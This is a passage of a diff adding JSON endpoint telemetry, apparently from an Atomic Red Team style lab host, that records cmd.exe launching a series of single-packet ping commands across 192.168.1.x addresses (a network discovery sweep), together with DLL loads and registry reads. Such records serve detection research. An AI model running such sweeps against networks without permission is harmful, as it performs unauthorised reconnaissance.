"{42FC7E13-CB73-5C05-0000-00104B415201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 4532, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572356990000, + "unique_pid": "{42FC7E13-CB73-5C05-0000-00104B415201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 4532, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572356990000, + "unique_pid": "{42FC7E13-CB73-5C05-0000-00104B415201}" + }, + { + "event_type": "process", + "pid": 4532, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572361990000, + "unique_pid": "{42FC7E13-CB73-5C05-0000-00104B415201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.79", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5920, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572362130000, + "unique_pid": "{42FC7E13-CB74-5C05-0000-0010FC435201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 5920, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572361990000, + "unique_pid": "{42FC7E13-CB74-5C05-0000-0010FC435201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5920, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572362140000, + "unique_pid": "{42FC7E13-CB74-5C05-0000-0010FC435201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5920, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572362140000, + "unique_pid": "{42FC7E13-CB74-5C05-0000-0010FC435201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5920, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572362140000, + "unique_pid": "{42FC7E13-CB74-5C05-0000-0010FC435201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5920, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572362140000, + "unique_pid": "{42FC7E13-CB74-5C05-0000-0010FC435201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 5920, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572362140000, + "unique_pid": "{42FC7E13-CB74-5C05-0000-0010FC435201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 5920, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572362140000, + "unique_pid": "{42FC7E13-CB74-5C05-0000-0010FC435201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 5920, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572362140000, + "unique_pid": "{42FC7E13-CB74-5C05-0000-0010FC435201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 5920, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572362140000, + "unique_pid": "{42FC7E13-CB74-5C05-0000-0010FC435201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 5920, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572362140000, + "unique_pid": "{42FC7E13-CB74-5C05-0000-0010FC435201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 5920, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572362140000, + "unique_pid": "{42FC7E13-CB74-5C05-0000-0010FC435201}" + }, + { + "event_type": "process", + "pid": 5920, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572366840000, + "unique_pid": "{42FC7E13-CB74-5C05-0000-0010FC435201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.80", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 4764, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572366980000, + "unique_pid": "{42FC7E13-CB74-5C05-0000-0010F4465201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 4764, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572366980000, + "unique_pid": "{42FC7E13-CB74-5C05-0000-0010F4465201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 4764, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572366980000, + "unique_pid": "{42FC7E13-CB74-5C05-0000-0010F4465201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4764, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572366980000, + "unique_pid": "{42FC7E13-CB74-5C05-0000-0010F4465201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4764, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572366980000, + "unique_pid": "{42FC7E13-CB74-5C05-0000-0010F4465201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4764, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572366980000, + "unique_pid": "{42FC7E13-CB74-5C05-0000-0010F4465201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 4764, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572366980000, + "unique_pid": "{42FC7E13-CB74-5C05-0000-0010F4465201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 4764, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572366980000, + "unique_pid": "{42FC7E13-CB74-5C05-0000-0010F4465201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 4764, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572366980000, + "unique_pid": "{42FC7E13-CB74-5C05-0000-0010F4465201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 4764, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572366980000, + "unique_pid": "{42FC7E13-CB74-5C05-0000-0010F4465201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 4764, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572366980000, + "unique_pid": "{42FC7E13-CB74-5C05-0000-0010F4465201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 4764, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572366980000, + "unique_pid": "{42FC7E13-CB74-5C05-0000-0010F4465201}" + }, + { + "event_type": "image_load", + "image_name": "execmodelproxy.dll", + "image_path": "C:\\Windows\\System32\\execmodelproxy.dll", + "pid": 4744, + "process_name": "explorer.exe", + "process_path": "C:\\Windows\\explorer.exe", + "timestamp": 131883572367460000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", + "registry_value": "BackgroundAccessApplications", + "timestamp": 131883572367460000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", + "registry_value": "BackgroundAccessApplications", + "timestamp": 131883572367460000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", + "registry_value": "BackgroundAccessApplications", + "timestamp": 131883572367460000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", + "registry_value": "BackgroundAccessApplications", + "timestamp": 131883572367460000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", + "registry_value": "BackgroundAccessApplications", + "timestamp": 131883572367460000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", + "registry_value": "BackgroundAccessApplications", + "timestamp": 131883572367460000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", + "registry_value": "BackgroundAccessApplications", + "timestamp": 131883572367460000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", + "registry_value": "BackgroundAccessApplications", + "timestamp": 131883572367460000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", + "registry_value": "BackgroundAccessApplications", + "timestamp": 131883572367460000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883572367460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883572367619984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883572367619984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883572367619984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883572367619984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883572367619984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883572367619984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883572367619984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883572367619984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883572367619984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883572367619984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883572367619984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883572367619984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883572367619984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883572367619984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883572367619984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883572367619984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883572367619984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883572367619984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883572367619984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883572367619984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883572367619984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883572367619984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883572367619984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "ploptin.dll", + "image_path": "C:\\Windows\\System32\\ploptin.dll", + "pid": 4744, + "process_name": "explorer.exe", + "process_path": "C:\\Windows\\explorer.exe", + "timestamp": 131883572367460000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "process", + "pid": 4764, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572371830000, + "unique_pid": "{42FC7E13-CB74-5C05-0000-0010F4465201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.81", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 556, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572371970000, + "unique_pid": "{42FC7E13-CB75-5C05-0000-0010584B5201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 556, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572371830000, + "unique_pid": "{42FC7E13-CB75-5C05-0000-0010584B5201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 556, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572371830000, + "unique_pid": "{42FC7E13-CB75-5C05-0000-0010584B5201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 556, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572371990000, + "unique_pid": "{42FC7E13-CB75-5C05-0000-0010584B5201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 556, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572371990000, + "unique_pid": "{42FC7E13-CB75-5C05-0000-0010584B5201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 556, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572371990000, + "unique_pid": "{42FC7E13-CB75-5C05-0000-0010584B5201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 556, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572371990000, + "unique_pid": "{42FC7E13-CB75-5C05-0000-0010584B5201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 556, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572371990000, + "unique_pid": "{42FC7E13-CB75-5C05-0000-0010584B5201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 556, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572371990000, + "unique_pid": "{42FC7E13-CB75-5C05-0000-0010584B5201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 556, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + 